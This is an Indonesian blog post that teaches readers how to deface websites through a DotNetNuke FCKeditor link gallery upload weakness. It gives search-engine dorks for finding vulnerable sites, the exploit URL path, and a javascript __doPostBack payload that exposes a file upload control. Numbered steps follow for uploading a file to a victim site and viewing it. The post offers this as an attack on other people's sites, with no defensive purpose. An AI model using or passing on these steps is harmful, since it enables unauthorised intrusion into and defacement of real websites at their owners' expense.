Deface Web Metode DNN (Dot Net Nuke) Vulnerability - Pak Inu

Pak Inu

Education

Ads Help Us !

test banner

Breaking

Post Top Ad

Responsive Ads Here

Post Top Ad

Sunday, May 29, 2016

Deface Web Metode DNN (Dot Net Nuke) Vulnerability

Assalamualaikum :)
Udah lama nih gua gak share tutor depes, Cz, gua lagi sibuk dalemin Digital Forensik
Sebenernya pos ini udah lama gua share di blog GrooSec Squad
Lagi males nulis pos, jadi yo gua re-share aja lah
Oke langsung ke topik pembahasan
Metode kali ini yaitu Dot Net Duke atau yang lebih dikenal FCK Link Gallery :)
Tapi metode ini hanya nitip file sob
Oke langsung aja yok



[+] DORK : 
inurl:tabid/176/Default.aspx
inurl:portals/0/ 
inurl:Fck/fcklinkgallery.aspx

[+] EXPLOIT :
www.NDAS.mu/[path]/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 

[+] CODE :
javascript:__doPostBack('ctlURL$cmdUpload','')

[+] Access File :
www.NDAS.mu/[path]/portals/0/FUCKYOU.txt

[+] Support file :
*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.wrf 

 [+] POC :

1. Dorking




2. Insert Exploit ,
      Klik Opsi Link Type : File, dan pilih Opsi File Location : Root

 
 



3. Ganti URL nya menjadi kode javascript:__doPostBack('ctlURL$cmdUpload','')



 4. Maka akan muncul penampakan seperti dibawah ini, dan langsung aja klik tombol Browse
     dan unggah file sampeyan ;)




 5. Nah jika sudah di unggah lalu access file sampeyan , dan jika sampeyan Tamvan, maka penampakan nya akan seperti gambar dibawah ini



   Thanks for visit
   Dont forget to like GrooSec Squad on Fanspage Facebook ;)

No comments:

Post a Comment

Post Top Ad